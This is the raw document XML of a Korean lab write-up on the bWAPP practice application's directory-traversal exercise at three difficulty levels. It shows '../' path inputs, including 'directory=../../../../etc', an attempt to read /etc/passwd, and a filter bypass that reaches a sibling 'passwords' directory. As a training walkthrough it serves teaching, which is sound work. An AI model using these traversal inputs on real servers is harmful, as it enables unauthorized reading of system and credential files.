            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">bWAPP </w:t>
            </w:r>
            <w:r w:rsidR="0056616F" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>내부 취약점을 알아본다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4078B9B8" w14:textId="1790A216" w:rsidR="0056616F" w:rsidRPr="0035631E" w:rsidRDefault="0056616F" w:rsidP="00C33C57">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D06EF" w:rsidRPr="0035631E" w14:paraId="2B3E72B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24E2717" w14:textId="77777777" w:rsidR="004D06EF" w:rsidRPr="0035631E" w:rsidRDefault="004D06EF" w:rsidP="00025C1B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42B1A5A9" w14:textId="77777777" w:rsidR="006F2E6D" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6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:rsidRPr="0035631E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35631E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:rsidRPr="0035631E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3785A2AB" w:rsidR="00BE7966" w:rsidRPr="0035631E" w:rsidRDefault="006F2E6D" w:rsidP="00025C1B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:bookmarkStart w:id="9" w:name="A"/>
            <w:bookmarkEnd w:id="9"/>
            <w:r w:rsidR="006B31BB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begin"/>
            </w:r>
            <w:r w:rsidR="009F0A19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instrText>HYPERLINK  \l "A_2"</w:instrText>
            </w:r>
            <w:r w:rsidR="009F0A19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</w:r>
            <w:r w:rsidR="006B31BB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separate"/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1</w:t>
            </w:r>
            <w:r w:rsidR="00735CB9" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">. 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direc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t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ory Tr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a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ver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s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a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l – D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i</w:t>
            </w:r>
            <w:r w:rsidR="00735CB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rectories</w:t>
            </w:r>
            <w:r w:rsidR="006B31BB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end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2168ABB4" w14:textId="77777777" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D" w:rsidP="00183DFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AC3468" w14:textId="018DABAE" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF" w:rsidP="00183DFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[ Directory Traversal – Directories</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ow ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFDC66" w14:textId="77777777" w:rsidR="000F44BE" w:rsidRPr="0035631E" w:rsidRDefault="000F44BE" w:rsidP="00183DFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BEFA0A" w14:textId="3B0ACA95" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF" w:rsidP="00E67F58">
      <w:pPr>
        <w:keepNext/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652E3479" wp14:editId="7C260BD9">
            <wp:extent cx="6840001" cy="2639667"/>
            <wp:effectExtent l="19050" t="19050" r="1841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63966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6F2E6D" w:rsidRPr="0035631E" w14:paraId="4715DD07" w14:textId="77777777" w:rsidTr="00735CB9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11046" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D051006" w14:textId="5183760C" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="000F44BE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페이지에 접속하면 </w:t>
            </w:r>
            <w:r w:rsidR="00183DFF" w:rsidRPr="0035631E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="00183DFF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">DF </w:t>
            </w:r>
            <w:r w:rsidR="00183DFF" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>파일들의 링크가 있고 클릭하면 열어볼 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A9D18F" w14:textId="478FD442" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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개발자 도구(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F12)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또는 페이지 소스코드 보기를 통해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PDF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파일들의 링크 주소를 확인한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FCA4D17" w14:textId="74FB0502" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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E8D059F" w14:textId="50E4D02B" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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512CFFE" w14:textId="6DC24353" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A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CEE8656" w14:textId="65A486A7" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A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3CEA6C8" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A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8BE51BD" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF" w:rsidP="00B540A5">
            <w:pPr>
              <w:keepNext/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5389F278" wp14:editId="01766518">
                  <wp:extent cx="6840001" cy="1998489"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="209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1998489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6C07" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5" w:rsidP="00B540A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3811190A" w14:textId="731D7D40" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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&lt;a&gt; 태그의 href 속성을 확인해보면 링크된 파일들이 공통적으로 "documents/" 디렉터리에 위치한다는 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="281E8D56" w14:textId="63F8B8D8" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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또한 페이지의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URL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을 확인해보면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directory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변수 파라미터의 값으로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documents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값이 있는 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C14091C" w14:textId="00C0A74F" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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따라서 현재 페이지에 출력된 파일들은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GET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방식으로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directory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변수 파라미터의 값의 디렉터리에 존재하는 파일들이라고 추측할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79DF207E" w14:textId="2EAE7602" w:rsidR="00183DFF" w:rsidRPr="0035631E" w:rsidRDefault="00183DFF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5F1F967" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5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259AB25" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D" w:rsidP="00B540A5">
            <w:pPr>
              <w:keepNext/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08E12A24" wp14:editId="4AB5034D">
                  <wp:extent cx="6840001" cy="3121046"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="222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3121046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2925B" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5" w:rsidP="00B540A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="33DD13FC" w14:textId="1326889D" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D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irectory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변수에 상위 디렉터리로 가는 상대경로(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../)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를 사용하여 상위 디렉터리로 이동할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4853A0CA" w14:textId="77777777" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D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7E6A70D" w14:textId="77777777" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D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E50BD6F" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D" w:rsidP="00B540A5">
            <w:pPr>
              <w:keepNext/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D753FAE" wp14:editId="08EC0FDC">
                  <wp:extent cx="6840001" cy="4813357"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2540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4813357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E8BA0" w14:textId="77777777" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9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2FB1E63" w14:textId="5AD5208C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한 단계 더 상위 디렉터리로 이동하게 되면 위와 같이 루트 디렉터리까지 이동할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646CAF53" w14:textId="094F6121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54DE6F6" w14:textId="153F7523" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9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3E7D7D62" wp14:editId="1965B917">
                  <wp:extent cx="6840001" cy="4014726"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2413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4014726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C0106" w14:textId="1F900199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7C2FE58" w14:textId="3C3757AA" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="00515D7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>directory=</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>./../../../</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>tc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322AF4D1" w14:textId="265BF293" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="004455B9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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t xml:space="preserve">tc </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">디렉터리에 있는 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
              <w:t>passwd</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>가 계정 비밀번호라고 추측하고 접근을 해본다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3075ABD9" w14:textId="5050A98E" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="004455B9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4185981C" w14:textId="77777777" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="004455B9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DAC2CEE" w14:textId="1BE8535E" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="00515D7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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3AD305D4" wp14:editId="4A2EBF9F">
                  <wp:extent cx="6840001" cy="4711405"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="133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4711405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0965E" w14:textId="55755EDA" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="00515D7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12C4AEB5" w14:textId="65618322" w:rsidR="004455B9" w:rsidRPr="0035631E" w:rsidRDefault="004455B9" w:rsidP="00515D7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>접근에 실패하는 것을 확인할 수 있</w:t>
            </w:r>
            <w:r w:rsidR="00707009" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">으며 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">directory </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">변수로 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">passwd </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">파일에 접근이 제한되어 </w:t>
            </w:r>
            <w:r w:rsidR="00707009" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>있음을 유추할</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266DBAF4" w14:textId="6BBF21BB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E7DF008" w14:textId="606E285D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D0F603B" w14:textId="51EBBF94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C216C40" w14:textId="0942CB24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277C92A" w14:textId="286D4D17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433365D" w14:textId="3BB93A71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C03E4C8" w14:textId="4C6C9D6E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DE05774" w14:textId="2287FCD2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5FACB8B" w14:textId="115F89BC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933BCE7" w14:textId="70E2A7F5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2524B21" w14:textId="6A1904D5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CDB4308" w14:textId="62A77A12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E030185" w14:textId="645E2441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AA1C2C2" w14:textId="7AB94A97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16F72F3" w14:textId="1B99A3EE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0329828" w14:textId="280A8960" w:rsidR="00574E0F" w:rsidRPr="0035631E" w:rsidRDefault="00574E0F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744FA26" w14:textId="6C3D4836" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58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608399B" w14:textId="049697B3" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58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0465DD5" w14:textId="468A89DF" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58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BD81384" w14:textId="1344206D" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58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79CA3FB" w14:textId="0F4B985F" w:rsidR="00613C77" w:rsidRPr="0035631E" w:rsidRDefault="00613C77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221333A" w14:textId="2EB7132F" w:rsidR="00613C77" w:rsidRPr="0035631E" w:rsidRDefault="00613C77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067C71E" w14:textId="77777777" w:rsidR="00613C77" w:rsidRPr="0035631E" w:rsidRDefault="00613C77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EDB96F0" w14:textId="77777777" w:rsidR="00E67F58" w:rsidRPr="0035631E" w:rsidRDefault="00E67F58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44AD2BB" w14:textId="41BBB9D6" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D" w:rsidP="00515D7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[ Directory Traversal – Directories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난이도 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: medium ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B20D6D" w14:textId="77777777" w:rsidR="00574E0F" w:rsidRPr="0035631E" w:rsidRDefault="00574E0F" w:rsidP="00515D7D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71F7F8D8" w14:textId="5D7E4643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F63EA11" wp14:editId="0A7195BA">
                  <wp:extent cx="6840001" cy="3027903"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="203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3027903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A504E" w14:textId="182CE008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C9B48EF" w14:textId="6D5E611E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난이도 </w:t>
            </w:r>
            <w:r w:rsidR="00B540A5" w:rsidRPr="0035631E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="00B540A5" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>edium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directory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변수에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“../”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값을 넣고 페이지 요청을 했으나 필터링이 되고 있음을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059D15D1" w14:textId="0B05A655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특수문자만 필터링하고 있을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수 있으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니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같은 상위 디렉터리를 가지는 다른 디렉터리로 이동을 해봤다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="765AB708" w14:textId="6BE75AD4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documents 디렉터리 절대 경로는 "/var/www/bWAPP/documents"이고 bWAPP 디렉터리 아래에 </w:t>
            </w:r>
            <w:r w:rsidR="00B540A5" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>passwords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디렉터리</w:t>
            </w:r>
            <w:r w:rsidR="00707009" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>가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존재하기 때문에 directory 변수 파라미터에 "</w:t>
            </w:r>
            <w:r w:rsidR="00B540A5" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>passwords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"를 넣고 페이지 요청을 해본다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E963858" w14:textId="63FC8818" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D" w:rsidP="00515D7D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69FDF1EF" w14:textId="65EF73FC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4A1D09C" w14:textId="6538F5DC" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5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53CF17B" wp14:editId="490E1146">
                  <wp:extent cx="6840001" cy="4670231"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="165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4670231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24B33" w14:textId="527E29E4" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D" w:rsidP="00515D7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위와 같이 documents 디렉터리와 같은 상위 디렉터리를 가지는 디렉터리에 한해서 페이지 내에서 파일 확인이 가능하다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C21A340" w14:textId="3D8BFEF3" w:rsidR="00515D7D" w:rsidRPr="0035631E" w:rsidRDefault="00515D7D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01E6AFD" w14:textId="1E7B0D91" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5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1C43622" w14:textId="0F5DBAFA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9DACFC8" w14:textId="7A61DFA7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7CE0C1F" w14:textId="56B3BDE1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888388E" w14:textId="2CEE74EE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308A407" w14:textId="0D898B05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0A6F68F" w14:textId="504DD18C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46CBC9A" w14:textId="6A8C4A7E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312A8DB" w14:textId="1DE48E4F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43441BE" w14:textId="43CAF615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C4F5839" w14:textId="6AF85F51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56D93BF" w14:textId="67C9E0D3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6C2E1B5" w14:textId="3D59BB8A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67C6E5B" w14:textId="5EA26F00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8939F4" w14:textId="63810F25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92EDF8C" w14:textId="4642E749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FAFA4CD" w14:textId="605218AC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8897445" w14:textId="5C3E6996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1657642" w14:textId="0C76A8DB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55B11F7" w14:textId="77777777" w:rsidR="00424D56" w:rsidRPr="0035631E" w:rsidRDefault="00424D56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D9D8F81" w14:textId="4C0753DB" w:rsidR="00695203" w:rsidRPr="0035631E" w:rsidRDefault="00695203" w:rsidP="00695203">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[ Directory Traversal – Directories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난이도 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 xml:space="preserve">: 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>h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igh ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5028D432" w14:textId="77777777" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5" w:rsidP="00695203">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DA928B8" w14:textId="4E477F4C" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5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7EB6B8A" wp14:editId="770FBDC6">
                  <wp:extent cx="6840001" cy="4167656"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2349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4167656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C8F12" w14:textId="12EBF259" w:rsidR="00695203" w:rsidRPr="0035631E" w:rsidRDefault="00695203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BFE7662" w14:textId="4C106711" w:rsidR="00007971" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5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앞선 난이도와 같은 파라미터 시도.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A8AB3A" w14:textId="63F42271" w:rsidR="00695203" w:rsidRPr="0035631E" w:rsidRDefault="000F44BE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27DA42D0" wp14:editId="29E6EB93">
                  <wp:extent cx="6840001" cy="4563051"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="2857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4563051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D49D5" w14:textId="77777777" w:rsidR="00695203" w:rsidRPr="0035631E" w:rsidRDefault="00695203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ECCE9AD" w14:textId="6CBED4AD" w:rsidR="00B540A5" w:rsidRPr="0035631E" w:rsidRDefault="00B540A5" w:rsidP="00183DFF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난이도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high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에서는 디렉터리를 이동하는 특수 문자,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같은 상위 디렉터리를 가지는 다른 디렉터리에도 접근할 수 없다.</w:t>
            </w:r>
          </w:p>
